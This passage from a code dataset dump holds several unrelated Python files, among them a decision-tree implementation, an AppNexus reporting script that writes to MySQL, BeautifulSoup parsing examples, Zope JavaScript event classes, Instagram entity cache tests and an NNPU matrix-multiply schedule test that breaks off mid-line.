tree_k_max_list:\n tree_k_subtree_dict.append(\n DecisionTree.get_pruned_tree_and_alpha_sequence(tree, thresh)\n )\n\n alphas = tree_max_sequences[\"alphas\"]\n potential_subtrees = tree_max_sequences[\"subtrees\"]\n\n alpha_cv_errors = []\n for alpha in alphas:\n err_alpha = 0\n for k, cv_tree in enumerate(tree_k_max_list):\n cv_alpha_subtree = DecisionTree.get_subtree_crspnd_to_abtry_alpha(\n cv_tree, alpha, thresh\n )\n err_alpha += DecisionTree.validate(\n cv_alpha_subtree, test_X[k], test_y[k]\n )\n\n alpha_cv_errors.append(err_alpha / k)\n\n alpha_cv_errors = np.array(alpha_cv_errors)\n optimal_index = int(\n np.where(alpha_cv_errors == alpha_cv_errors.min())[0]\n ) # if multiple trees achieve the\n optimal_subtree = potential_subtrees[optimal_index]\n optimal_subtree.feature_names = feature_names\n\n return optimal_subtree\n\n # Algorithm Implementation and Fitting Functions\n\n def find_best_splitting_point(self, X, y):\n\n n, p = X.shape\n split_index = None\n split_value = None\n loss = float(\"Inf\")\n\n for var_index in range(p):\n # loop through covariates\n\n x = X[:, var_index]\n sort_index = np.argsort(x)\n sorted_x, sorted_y = x[sort_index], y[sort_index]\n\n for i in range(self._min_leaf - 1, n - self._min_leaf):\n # loop through potential splitting points\n\n xi = sorted_x[i]\n if xi == sorted_x[i + 1]:\n continue\n\n lhs_count, lhs_loss = i + 1, compute_loss(sorted_y[: (i + 1)])\n rhs_count, rhs_loss = n - i - 1, compute_loss(sorted_y[(i + 1) :])\n\n tmp_loss = (\n lhs_count * lhs_loss + rhs_count * rhs_loss\n ) # = SSE_left + SSE_right\n\n if tmp_loss < loss:\n split_index, split_value, loss = var_index, xi, tmp_loss\n\n return split_index, split_value, loss\n\n def fit(self, X, y, min_leaf=5, max_depth=10):\n # Check Input Values\n if self.is_root:\n assert min_leaf >= 1, \"Parameter <> has to be bigger than one.\"\n assert (\n max_depth >= 1\n ), \"Parameter <> has to be bigger or equal than one.\"\n assert len(X) == len(\n y\n ), \"Data <> and <> must have the same number of observations.\"\n assert len(y) >= 2 * min_leaf, (\n \"Data has not enough observations for a single split to occur \"\n \"given value of <>.\"\n )\n\n # Do Stuff for Root\n if self.is_root:\n try:\n self._feature_names = X.columns.values\n except AttributeError:\n pass\n X = coerce_to_ndarray(\n X\n ) # coerce to ndarray (since all following functions expect numpy arrays)\n y = coerce_to_ndarray(y)\n self._num_features = X.shape[1]\n\n # Set Parameters\n self._min_leaf = min_leaf\n self._value = np.mean(y)\n self._y = y\n self._node_loss = np.sum(\n (self._y - self._value) ** 2\n ) # = sum of squared residuals when predicting the mean\n\n # Actual Fitting\n self._split_var, self._split_value, tmp_loss = self.find_best_splitting_point(\n X, y\n )\n self._is_fitted = True\n\n if self._split_var is None:\n self._branch_loss = self._node_loss\n else:\n self._branch_loss = tmp_loss\n\n if self._split_var is not None and max_depth >= 1:\n index = X[:, self._split_var] <= self._split_value\n\n self._left_child = DecisionTree(parent=self)\n self._right_child = DecisionTree(parent=self)\n self._left_child.feature_names = self.feature_names\n self._right_child.feature_names = self.feature_names\n\n self._left_child.fit(X[index], y[index], min_leaf, max_depth - 1)\n self._right_child.fit(X[~index], y[~index], min_leaf, max_depth - 1)\n\n self.update_branch_loss()\n return self\n\n def predict_row(self, xi):\n if self.is_leaf:\n return self._value\n child = (\n self._left_child\n if xi[self._split_var] <= self._split_value\n else self._right_child\n )\n return child.predict_row(xi)\n\n def predict(self, x):\n x = coerce_to_ndarray(x)\n assert (\n self._is_fitted\n ), \"The tree has not yet been fitted; no prediction is possible.\"\n assert (\n x.shape[1] == self._num_features\n ), \"New Data must have the same dimension as the Data used for Fitting.\"\n\n return np.array([self.predict_row(xi) for xi in x])\n\n def plot(self, render=False, save=False, filename=None):\n if filename is None:\n filename = \"decision_tree.svg\"\n dot = Graph(name=\"decision_tree\", filename=filename, format=\"svg\")\n dot.node(\n str(id(self)),\n self.splitting_info_to_string()\n + \"\\nestimate:\"\n + str(round(float(self.value), 3)),\n )\n for i in range(self.depth):\n nodes = DecisionTree.get_level_in_list(self, i + 1)\n for node in nodes:\n if node.left_child is None:\n dot.node(\n str(id(node)),\n \"This node is not split\"\n + \"\\nestimate:\"\n + str(round(float(node.value), 3)),\n )\n dot.edge(str(id(node.parent)), str(id(node)))\n else:\n dot.node(\n str(id(node)),\n node.splitting_info_to_string()\n + \"\\nestimate:\"\n + str(round(float(node.value), 3)),\n )\n dot.edge(str(id(node.parent)), str(id(node)))\n if render:\n dot.render(view=True)\n if save:\n dot.save()\n return dot\n\n\n# General Function (Some of which might be static methods in a strict sense)\n\n\ndef pre_order_traverse_tree(root: DecisionTree, func=None) -> list:\n values = []\n if func is None:\n if root is not None:\n values.append(root)\n values.extend(pre_order_traverse_tree(root.left_child))\n values.extend(pre_order_traverse_tree(root.right_child))\n else:\n if root is not None:\n values.append(func(root))\n values.extend(pre_order_traverse_tree(root.left_child, func=func))\n values.extend(pre_order_traverse_tree(root.right_child, func=func))\n return values\n\n\ndef g_value(node: DecisionTree) -> float:\n return (\n float(\"Inf\")\n if node.is_leaf\n else (node.node_loss - node.branch_loss) / (node.number_of_leafs - 1)\n )\n\n\ndef g(branch: DecisionTree) -> tuple:\n nodes = pre_order_traverse_tree(branch)\n values = np.array(pre_order_traverse_tree(branch, g_value))\n minimum = values.min()\n argmin_index = np.where(values == minimum)[0]\n argmin = [nodes[ix] for ix in argmin_index]\n return argmin, minimum\n\n\ndef coerce_to_ndarray(obj) -> np.ndarray:\n if isinstance(obj, np.ndarray):\n return obj\n elif isinstance(obj, (pd.Series, pd.DataFrame)):\n return obj.values\n else:\n raise TypeError(\n \"Object was given with inappropriate type;\"\n \"for matrices and vectors only use pandas Series, DataFrame or \"\n \"Numpy ndarrays\"\n )\n\n\ndef compute_loss(y, loss_func=None) -> float:\n if loss_func is None:\n loss = np.var(y)\n else:\n loss = loss_func(y)\n\n if loss is None:\n raise ValueError(\"Loss function cannot be computed on the outcome vector.\")\n else:\n return float(loss)\n\n\ndef test_monotonicity_list(lst: list, strictly=True) -> bool:\n if strictly:\n return all(x < y for x, y in zip(lst, lst[1:]))\n else:\n return all(x <= y for x, y in zip(lst, lst[1:]))\n","sub_path":"causal_tree/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":17943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"471247715","text":"#!/usr/bin/env python\nimport requests\nimport urllib\nimport json\nimport ConfigParser\nimport MySQLdb\n\nconfig = ConfigParser.RawConfigParser()\nconfig.read('appnexus-default.properties')\n\n\nclass AppNexusBasicStats:\n \"\"\"Gets AppNexus basic stats (impressions and revenue) and writes them to a MySQL table\"\"\"\n\n def __init__(self):\n\n # The possible named report intervals are documented here: https://wiki.appnexus.com/display/api/Report+Service\n # Search on the page for \"report_interval\"\n self.report_interval = \"today\"\n\n self.authenticate()\n self.connectToDB()\n self.createTable()\n self.createReportChunkUrls()\n self.makeCallsAndWriteToDB()\n\n def authenticate(self):\n self.s = requests.session()\n credentials = json.dumps(\n {'auth': {'username': config.get('appnexus', 'username'), 'password': config.get('appnexus', 'password')}})\n self.s.post(url=\"https://api.appnexus.com/auth\", data=credentials)\n\n def connectToDB(self):\n self.con = MySQLdb.connect(host=config.get('database', 'host'), db=config.get('database', 'db'),\n user=config.get('database', 'username'), passwd=config.get('database', 'password'))\n\n def createTable(self):\n sql = \"DROP TABLE IF EXISTS appnexus_basic_stats\"\n self.cursor = self.con.cursor()\n self.cursor.execute(sql)\n sql = \"CREATE TABLE appnexus_basic_stats (publisher_id int, publisher_name varchar(255), impressions bigint, revenue decimal(15, 5))\"\n self.cursor.execute(sql)\n\n def createReportChunkUrls(self):\n response = self.s.get(url=\"http://api.appnexus.com/publisher\")\n response_count = json.loads(response.content)['response']['count']\n start_elements = [start_element for start_element in range(0, response_count, 100)]\n self.urls = []\n for start_element in start_elements:\n url = \"http://api.appnexus.com/publisher?\" + urllib.urlencode(\n {\"state\": \"active\", \"interval\": self.report_interval, \"sort\": \"imps.desc\", \"stats\": \"true\",\n \"object_status\": \"true\", \"is_rtb\": \"false\", \"start_element\": start_element, \"num_elements\": \"100\"})\n self.urls.append(url)\n\n def makeCallsAndWriteToDB(self):\n for url in self.urls:\n response = self.s.get(url=url)\n\n for publisher in json.loads(response.content)['response']['publishers']:\n\n id = publisher['id']\n name = publisher['name']\n imps = publisher['stats']['imps']\n revenue = publisher['stats']['revenue']\n\n if imps == None:\n imps = 0\n\n if revenue == None:\n revenue = 0\n\n sql = \"\"\"INSERT INTO appnexus_basic_stats (publisher_id, publisher_name, impressions, revenue) VALUES ({0}, {1}, {2}, {3})\"\"\".format(\n id, json.dumps(name), imps, revenue)\n self.cursor.execute(sql)\n\n self.cursor.execute('commit')\n\nif __name__ == \"__main__\":\n appNexusBasicStats = AppNexusBasicStats()\n","sub_path":"appnexus_basic_stats.py","file_name":"appnexus_basic_stats.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600472551","text":"from bs4 import BeautifulSoup\n\n# from file\npath = 'datas/sample03.html'\n\nwith open(path) as fp:\t\t\t\t\t\t# shared github\n soup = BeautifulSoup(fp, features='lxml')\n title_data = soup.find('h1')\t\t\t\t\t\t\t\t\t# tag로 검색\n print(type(title_data), title_data, title_data.string)\n title_data = soup.find_all(id='h1_id_name')\t\t\t\t\t# id로 검색\n print(title_data, title_data[0].get_text())\n title_data = soup.find_all('p', class_='public_class_name')\t# tag와 class로 검색\n print(title_data, title_data[0].attrs)\n # [

웹페이지에서 ... 하는 것

]\n # {'class': ['public_class_name'], 'id': 'p01_id_name'}\n title_data = soup.find_all('p', attrs = {'align': 'center'})\t\t# 속성:속성값으로 검색\n print(title_data, title_data[0].string)\n title_data = soup.find_all('a', href=True)\t\t\t\t\t# 속성 존재 여부 검색\n print(title_data, title_data[0].string)\n\n\nwith open(path) as fp:\n soup = BeautifulSoup(fp, features='lxml')\n print(type(soup), soup.attrs, soup.getText())\n # {} The Dormouse's story ...\n\n elements = soup.findAll(name='a')\n print(type(elements), len(list(elements)))\n # 3\n for element in elements:\n print(type(element), element.attrs, element['href'])\n print(element.getText(), len(element.getText())) # need trip()\n # {'class': ['sister']...} http://example01.com/elsie Elsie 14\n # ...\n \n body_tag = soup.body\n bodychildren = body_tag.children\n print(type(bodychildren), len(list(bodychildren)))\n # 7\n \n from bs4.element import NavigableString\n for child in body_tag.children:\n if isinstance(child, NavigableString):\n print(type(child), repr(child.string), len(child.string))\n else:\n print(type(child), child.attrs, child.getText(), len(child.getText()))\n # '\\n' 1\n # {'class': ['title']} \n # The Dormouse's story\n # ...\n # ","sub_path":"codes/beatifulsoups/getAttrsandText.py","file_name":"getAttrsandText.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"296614504","text":"##############################################################################\n#\n# Copyright (c) 2007 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Javascript Form Framework Event Framework.\n\n$Id: $\n\"\"\"\n__docformat__ = \"reStructuredText\"\nimport sys\nimport zope.component\nimport zope.interface\nfrom zope.publisher.interfaces.browser import IBrowserRequest\nfrom zope.viewlet import viewlet\n\nfrom z3c.formjs import interfaces\n\n\nclass JSEvent(object):\n \"\"\"Javascript Event\"\"\"\n zope.interface.implements(interfaces.IJSEvent)\n\n def __init__(self, name):\n self.name = name\n\n def __repr__(self):\n return '' % self.name\n\n\nCLICK = JSEvent(\"click\")\nDBLCLICK = JSEvent(\"dblclick\")\nCHANGE = JSEvent(\"change\")\nLOAD = JSEvent(\"load\")\nBLUR = JSEvent(\"blur\")\nFOCUS = JSEvent(\"focus\")\nKEYDOWN = JSEvent(\"keydown\")\nKEYUP = JSEvent(\"keyup\")\nMOUSEDOWN = JSEvent(\"mousedown\")\nMOUSEMOVE = JSEvent(\"mousemove\")\nMOUSEOUT = JSEvent(\"mouseout\")\nMOUSEOVER = JSEvent(\"mouseover\")\nMOUSEUP = JSEvent(\"mouseup\")\nRESIZE = JSEvent(\"resize\")\nSELECT = JSEvent(\"select\")\nSUBMIT = JSEvent(\"submit\")\n\nEVENTS = (CLICK, DBLCLICK, CHANGE, LOAD, BLUR, FOCUS, KEYDOWN, KEYUP,\n MOUSEDOWN, MOUSEMOVE, MOUSEOUT, MOUSEOVER, MOUSEUP, RESIZE, SELECT,\n SUBMIT)\n\nclass IdSelector(object):\n zope.interface.implements(interfaces.IIdSelector)\n\n def __init__(self, id):\n self.id = id\n\n def __repr__(self):\n return '<%s \"%s\">' %(self.__class__.__name__, self.id)\n\n\nclass CSSSelector(object):\n zope.interface.implements(interfaces.ICSSSelector)\n\n def __init__(self, expr):\n self.expr = expr\n\n def __repr__(self):\n return '<%s \"%s\">' %(self.__class__.__name__, self.expr)\n\n\nclass JSSubscription(object):\n zope.interface.implements(interfaces.IJSSubscription)\n\n def __init__(self, event, selector, handler):\n self.event = event\n self.selector = selector\n self.handler = handler\n\n def __repr__(self):\n return '<%s event=%r, selector=%r, handler=%r>' % (\n self.__class__.__name__, self.event, self.selector, self.handler)\n\n\nclass JSSubscriptions(object):\n zope.interface.implements(interfaces.IJSSubscriptions)\n\n def __init__(self):\n self._subscriptions = []\n\n def subscribe(self, event, selector, handler):\n subscription = JSSubscription(event, selector, handler)\n self._subscriptions.append(subscription)\n return subscription\n\n def __iter__(self):\n return iter(self._subscriptions)\n\n\ndef subscribe(selector, event=CLICK):\n \"\"\"A decorator for defining a javascript event handler.\"\"\"\n def createSubscription(func):\n frame = sys._getframe(1)\n f_locals = frame.f_locals\n subs = f_locals.setdefault('jsSubscriptions', JSSubscriptions())\n return subs.subscribe(event, selector, func)\n return createSubscription\n\n\nclass JSSubscriptionsViewlet(viewlet.ViewletBase):\n \"\"\"An viewlet for the JS viewlet manager rendering subscriptions.\"\"\"\n zope.component.adapts(\n zope.interface.Interface,\n IBrowserRequest,\n interfaces.IHaveJSSubscriptions,\n zope.interface.Interface)\n\n # This viewlet wants to be very heavy, so that it is rendered after all\n # the JS libraries are loaded.\n weight = 1000\n\n def update(self):\n self.renderer = zope.component.getMultiAdapter(\n (self.__parent__.jsSubscriptions, self.request),\n interfaces.IRenderer)\n self.renderer.update()\n\n def render(self):\n content = self.renderer.render()\n return u'' % content\n","sub_path":"z3c.formjs/tags/0.2.1/src/z3c/formjs/jsevent.py","file_name":"jsevent.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"284391548","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom puzzle.models.dotdict import DotDict\n\nlogger = logging.getLogger(__name__)\n\n\nclass Plugin(object):\n \"\"\"docstring for Plugin\"\"\"\n def __init__(self):\n super(Plugin, self).__init__()\n self.db = None\n self.puzzle_db = None\n self.individuals = None\n self.case_obj = None\n self.variant_type = 'snv'\n self.filters = DotDict(\n can_filter_frequency=False,\n can_filter_cadd=False,\n can_filter_consequence=False,\n can_filter_gene=False,\n can_filter_inheritance=False,\n can_filter_sv=False\n )\n\n def init_app(self, app):\n \"\"\"Initialize plugin via Flask.\"\"\"\n self.root_path = app.config['PUZZLE_ROOT']\n self.pattern = app.config['PUZZLE_PATTERN']\n\n def cases(self, pattern=None):\n \"\"\"Return all cases.\"\"\"\n raise NotImplementedError\n\n def variants(self, case_id, skip=0, count=30, filters=None):\n \"\"\"Return count variants for a case.\n\n \"\"\"\n raise NotImplementedError\n\n def variant(self, variant_id):\n \"\"\"Return a specific variant.\"\"\"\n raise NotImplementedError\n\n def individual_dict(self, ind_ids):\n \"\"\"Return a dict with ind_id as key and Individual as values.\"\"\"\n ind_dict = {ind.ind_id: ind for ind in self.individuals(ind_ids=ind_ids)}\n return ind_dict\n","sub_path":"puzzle/plugins/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"548455704","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 11 12:03:09 2020\n\n@author: ptruong\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\nfrom constants import get_log2FC_ratio_matrices\n\ndef get_differentially_expressed_proteins_from_log2FC_df(method, sample1, sample2, specie, ratio, two_sided = False):\n \"\"\"\n Takes log2FC df from get_log2FC_matrix() and computes differentially expressed \n proteins for each run.\n \n example params:\n \n method = \"triq\" # VAR\n sample1 = \"S02\" # VAR\n sample2 = \"S06\" # VAR\n specie = \"HUMAN\" # VAR\n ratio = 0.8 # VAR - ratio for what is considered diff. exp.\n two_sided = False # VAR - is this needed? I will skip this for now\n \n NOTE: two_sided does nothing atm. left for furutre fix.\n \"\"\"\n ARATH_FC_matrix, CAEEL_FC_matrix, HUMAN_FC_matrix = get_log2FC_ratio_matrices()\n \n if specie == \"HUMAN\":\n FC_matrix = HUMAN_FC_matrix\n FC_treshold = ratio * FC_matrix[sample2][sample1] #The smaples are reversed because the log2FC in this function is reversed.\n file_name = method+\"_\"+\"log2FC\"+\"_\"+sample1+\"_\"+sample2+\"_\"+specie+\".csv\"\n df_log2FC = pd.read_csv(file_name, sep = \"\\t\")\n diffExp = np.sum(df_log2FC[df_log2FC > FC_treshold] > 0) #This comparison should be more then\n elif specie == \"ARATH\":\n FC_matrix = ARATH_FC_matrix\n FC_treshold = ratio * FC_matrix[sample2][sample1] #The smaples are reversed because the log2FC in this function is reversed.\n file_name = method+\"_\"+\"log2FC\"+\"_\"+sample1+\"_\"+sample2+\"_\"+specie+\".csv\"\n df_log2FC = pd.read_csv(file_name, sep = \"\\t\")\n diffExp = np.sum(df_log2FC[df_log2FC < -ratio] > 0) + np.sum(df_log2FC[df_log2FC > ratio] > 0) #This comparison should be if less or more than ratio\n elif specie == \"CAEEL\":\n FC_matrix = CAEEL_FC_matrix\n FC_treshold = ratio * FC_matrix[sample2][sample1] #The smaples are reversed because the log2FC in this function is reversed.\n file_name = method+\"_\"+\"log2FC\"+\"_\"+sample1+\"_\"+sample2+\"_\"+specie+\".csv\"\n df_log2FC = pd.read_csv(file_name, sep = \"\\t\")\n diffExp = np.sum(df_log2FC[df_log2FC < FC_treshold] > 0) #This comparison should be less than\n else:\n print(\"no species specificed\")\n # return \n return diffExp\n","sub_path":"bin/log2fc_from_melt_computation.py","file_name":"log2fc_from_melt_computation.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"360942619","text":"# yaaddda ya\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon\npts = np.array([[0,0], [4,0], [2, np.sqrt(5**2 - 2**2)]])\np = Polygon(pts, closed=True)\nax = plt.gca()\nax.add_patch(p)\nax.set_xlim(0,4)\nax.set_ylim(0,5)\nplt.show()\n","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"343509788","text":"#!/usr/bin/env python\nimport sys\nimport itertools\n\nfrom roehrenkonstruktion import Roehrenkonstruktion\nfrom util import Vector\n\ndef readPoint(line):\n point = line.split()\n return Vector(float(point[0]), float(point[1]))\n\ndef readFile(filename):\n f = open(filename, \"r\")\n lines = f.read().splitlines()\n project_name = lines[0]\n start_point = readPoint(lines[1])\n initial_dir = readPoint(lines[2])\n goal_point = readPoint(lines[3])\n\n return project_name, start_point, initial_dir, goal_point\n\ndef generate_str(project_name, tubes, cost):\n stringarray = [\"reset\", \"set size ratio -1\", 'set title \"{}, Kosten: {}\"'.format(project_name, cost),\n \"set key off\", \"plot '-' using 1:2:3:4 with vectors filled head lc 0\"]\n for line in tubes:\n stringarray.append(\" \".join(map(str, itertools.chain(*line[:-1])) + [\"#\", line[-1]]))\n return \"\\n\".join(stringarray)\n\ndef writetoFile(str_to_write, filename, end=\".out\"):\n filename = filename.rsplit(\".\",1)[0] + end\n f = open(filename, \"w\")\n f.write(str_to_write)\n f.close()\n\ndef run(filename):\n project_name, start_point, initial_dir, goal_point = readFile(filename)\n problem = Roehrenkonstruktion()\n solution = problem.solveProblem(start_point, initial_dir, goal_point)\n return generate_str(project_name, solution[:-1], solution[-1])\n\nif __name__ == \"__main__\":\n for arg in sys.argv[1:]:\n res_str = run(arg)\n writetoFile(res_str, arg)\n\n\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"473443857","text":"from instagram.entities import Account, Comment, Location, Media, Story, Tag\nimport pytest\nfrom random import randint, choice\nfrom string import ascii_uppercase, ascii_lowercase, digits\n\n\ndef setup_function():\n Account.clear_cache()\n Comment.clear_cache()\n Location.clear_cache()\n Media.clear_cache()\n Story.clear_cache()\n Tag.clear_cache()\n\n\ndef id():\n return \"\".join(\n choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(randint(1, 50))\n )\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_account(id):\n account = Account(id)\n assert Account.cache == {id: account}\n\n Account.clear_cache()\n assert Account.cache == dict()\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_media(id):\n media = Media(id)\n assert Media.cache == {id: media}\n\n Media.clear_cache() \n assert Media.cache == dict()\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_location(id):\n location = Location(id)\n assert Location.cache == {id: location}\n\n Location.clear_cache()\n assert Location.cache == dict()\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_tag(id):\n tag = Tag(id)\n assert Tag.cache == {id: tag}\n\n Tag.clear_cache()\n assert Tag.cache == dict()\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_comment(id):\n account = Account(\"test\")\n media = Media(\"test\")\n comment = Comment(id, media=media, owner=account, text=\"test\", created_at=0)\n assert Comment.cache == {id: comment} \n\n Comment.clear_cache()\n assert Comment.cache == dict()\n assert Media.cache == {\"test\": media}\n assert Account.cache == {\"test\": account}\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_story(id):\n story = Story(id)\n assert Story.cache == {id: story}\n \n Story.clear_cache()\n assert Story.cache == dict()\n","sub_path":"tests/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"720271","text":"import nnpu\nimport tvm\nimport topi\nfrom nnpu.utils import ScheduleProcHelper\nimport numpy as np\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='test of NNPU Op')\nparser.add_argument('--sim', type=str, help='the simulator to use', \n default='S0', choices=['S0', 'S1', 'SC'])\nargs = parser.parse_args()\n\ncfg_path = './nnpu_config.davinci.yaml'\ngemm_shape = (8, 8, 8)\ndim_x, dim_y = 16, 8\nfactor_x, factor_y = 1, 8 # to split outter loop\n\nwith ScheduleProcHelper(), nnpu.Environment(cfg_path):\n env = nnpu.get_env()\n nnpu.set_device(env, type=args.sim)\n shape1 = (128, 1024)\n shape2 = (1024, 1024)\n\n factor = gemm_shape[1]\n assert shape1[1] == shape2[1], \\\n 'gemm do dot product between rows, so the shape[1] of inputs should match'\n assert shape1[0] % gemm_shape[0] == 0, 'gemm insn require size of input 1 be x{0}'.format(gemm_shape[0])\n assert shape2[0] % gemm_shape[2] == 0, 'gemm insn require size of input 2 be x{0}'.format(gemm_shape[0])\n assert shape1[1] % factor == 0, 'gemm insn requires size of reduce dim be multiples of {0}'.format(factor)\n\n dtype_n, dtype_w = env.cfg['dtype_n'], env.cfg['dtype_w']\n \n a = tvm.placeholder(shape1, dtype_n, 'a')\n b = tvm.placeholder(shape2, dtype_n, 'b')\n bias = tvm.placeholder((shape2[0],), dtype_w, 'bias')\n\n shape1_tiled = (shape1[0] // gemm_shape[0], shape1[1] // factor, \n gemm_shape[0], factor)\n shape2_tiled = (shape2[0] // gemm_shape[2], shape2[1] // factor,\n gemm_shape[2], factor)\n a_buf = tvm.compute(shape1_tiled, lambda no, ico, ni, ici: a[no * gemm_shape[0] + ni, ico * factor + ici], 'a_buf')\n b_buf = tvm.compute(shape2_tiled, lambda oco, ico, oci, ici: b[oco * gemm_shape[2] + oci, ico * factor + ici], 'b_buf')\n\n out_shape_tiled = (shape1_tiled[0], shape2_tiled[0], shape1_tiled[2], shape2_tiled[2])\n ko = tvm.reduce_axis((0, shape1[1] // factor), 'ko')\n ki = tvm.reduce_axis((0, factor), 'ki')\n\n out_buf = tvm.compute(out_shape_tiled, \n lambda xo, yo, xi, yi:\n tvm.sum(a_buf[xo, ko, xi, ki].astype(dtype_w) \n * b_buf[yo, ko, yi, ki].astype(dtype_w),\n axis=[ko, ki]),\n 'out_buf')\n # out_buf = tvm.compute(out_shape_tiled, lambda *i: out_acc(*i), 'out_buf')\n res_buf = tvm.compute(out_shape_tiled, lambda no, oco, ni, oci: (out_buf[no, oco, ni, oci] + bias[oco * factor + oci]).astype(dtype_n), 'res_buf')\n res_l0 = tvm.compute(out_shape_tiled, lambda *i: res_buf(*i), 'res_l0')\n out_host = tvm.compute(out_shape_tiled, lambda *i: res_l0(*i), 'out_host')\n\n # schedule\n out_acc = out_buf\n s = nnpu.create_schedule(out_host.op)\n al_scope = 'buffer1'\n bl_scope = 'buffer2'\n al = s.cache_read(a_buf, env.get_scope(al_scope), out_acc)\n bl = s.cache_read(b_buf, env.get_scope(bl_scope), out_acc)\n bias_buf = s.cache_read(bias, env.get_scope('buffer4'), res_buf)\n\n # set scope\n s[a_buf].set_scope(env.get_scope('buffer0'))\n s[b_buf].set_scope(env.get_scope('buffer0'))\n s[out_buf].set_scope(env.get_scope('buffer3'))\n s[bias_buf].set_scope(env.get_scope('buffer5'))\n s[res_buf].set_scope(env.get_scope('buffer4'))\n s[res_l0].set_scope(env.get_scope('buffer0'))\n # s[out_acc].set_scope(env.get_scope('acc'))\n\n # pragma read\n s[a_buf].pragma(a_buf.op.axis[0], env.dma_copy_to_buf)\n s[b_buf].pragma(b_buf.op.axis[0], env.dma_copy_to_buf)\n s[bias_buf].pragma(bias_buf.op.axis[0], env.dma_copy_to_buf)\n s[al].pragma(al.op.axis[0], env.scratchpad_copy)\n s[bl].pragma(bl.op.axis[0], env.scratchpad_copy)\n s[res_l0].pragma(res_l0.op.axis[0], env.scratchpad_copy)\n # s[out_buf].pragma(out_buf.op.axis[0], env.copy_acc2buf)\n\n # tensorize\n # out_acc = out_buf\n xo, yo, xi, yi = out_acc.op.axis\n ko, ki = out_acc.op.reduce_axis\n koo, koi = s[out_acc].split(ko, 4) # a schedule argument\n s[out_acc].reorder(koo, xo, yo, koi, xi, yi, ki)\n s[out_acc].tensorize(xi, env.intrins.get('GEMM', shape=gemm_shape, mode='inc', \n scope_out='buffer3', scope_in1='buffer1',\n scope_in2='buffer2'))\n s[b_buf].compute_at(s[out_acc], koo)\n s[al].compute_at(s[out_acc], koo)\n s[bl].compute_at(s[out_acc], koo)\n\n # tensorize add bias\n s[res_buf].tensorize(res_buf.op.axis[2], \n env.intrins.get('MAddV', shape=(gemm_shape[0], gemm_shape[2]),\n scope_in_mat='buffer3', scope_in_vctr='buffer5', scope_out='buffer4', mode='dec'))\n\n # split output\n xo, yo, tx, ty = out_host.op.axis\n # this the the rows of matrix loaded to faster scratchpad\n vt, yo = s[out_host].split(yo, nparts=2)\n l1_x, l1_y = 16, 64\n xl1, yl1, xi, yi = s[out_host].tile(xo, yo, l1_x, l1_y)\n l0_x, l0_y = 16, 64\n xl0, yl0, xi, yi = s[out_host].tile(xi, yi, l0_x, l0_y)\n\n s[out_host].reorder(vt, xl1, yl1, xl0, yl0, xi, yi, tx, ty)\n s[out_host].pragma(xi, env.dma_copy_from_buf)\n\n # bind to virtual thread\n s[out_host].bind(vt, tvm.thread_axis(\"cthread\"))\n\n # compute_at\n s[a_buf].compute_at(s[out_host], xl1)\n # s[b_buf].compute_at(s[out_host], yl0)\n # s[out_acc].compute_at(s[out_host], yl0)\n s[out_buf].compute_at(s[out_host], yl0)\n s[res_buf].compute_at(s[out_host], yl0)\n s[res_l0].compute_at(s[out_host], yl0)\n s[bias_buf].compute_at(s[out_host], vt)\n\n print(nnpu.lower(s, [a, b, bias, out_host], simple_mode=True))\n # exit(0)\n func = nnpu.build(s, [a, b, bias, out_host], 'nnpu', 'llvm', 'nnpu_func')\n print('------------------- device module 1 TVM IR: ')\n print(func.imported_modules[0].get_source('ir'))\n print('------------------- device module 1 uop: ')\n print(func.imported_modules[0].get_source('uop'))\n # exit(0)\n\n ctx = tvm.nd.TVMContext(13, 0)\n a_np = np.random.randint(size=shape1, dtype=a.dtype, low = -16, high = 16)\n # a_np = np.ones(shape1, dtype=a.dtype)\n a_nd = tvm.nd.array(a_np, ctx)\n b_np = np.random.randint(size=shape2, 